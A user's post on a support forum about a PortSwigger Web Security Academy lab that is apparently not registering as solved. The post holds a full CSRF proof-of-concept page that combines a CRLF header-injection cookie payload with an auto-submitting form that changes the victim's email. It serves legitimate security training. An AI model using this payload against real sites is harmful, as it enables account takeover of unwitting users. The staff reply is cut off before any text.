The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.


Lab Solution not working

Dominik | Last updated: Oct 19, 2022 02:57PM UTC

Hi! I'm currently doing the burp academy and therefore a lot of labs. I'm trying to do the CSRF Duplicated in Cookie-Lab and it seems to be bugged? I tried it on my own and with the solution; when I test it, the email gets changed and it works well. But if I send it to the victim, the lab doesn't get solved. Is there a known problem or am I doing something wrong? I followed the steps from the solution and from a video tutorial (where it worked) exactly. A colleague of mine also looked into it and didn't find a problem with my solution.

Link to the lab: https://portswigger.net/web-security/csrf/lab-token-duplicated-in-cookie

My solution (csrf html):

    <html>
      <!-- CSRF PoC - generated by Burp Suite Professional -->
      <body>
        <script>history.pushState('', '', '/')</script>
        <form action="https://ID.web-security-academy.net/my-account/change-email" method="POST">
          <input type="hidden" name="email" value="anything%40web-security-academy.net" />
          <input type="hidden" name="csrf" value="fake" />
          <input type="submit" value="Submit request" />
        </form>
        <img src="https://ID.web-security-academy.net/?search=test%0d%0aSet-Cookie:%20csrf=fake%20SameSite=None" onerror="document.forms[0].submit();"/>
      </body>
    </html>

I also tried a real csrf token (regarding the size and copied one) just in case the "fake" doesn't work (even though it's in the solution).

Thanks for your help!

Michelle, PortSwigger Agent | Last updated: Oct 19, 2022 04:28PM UTC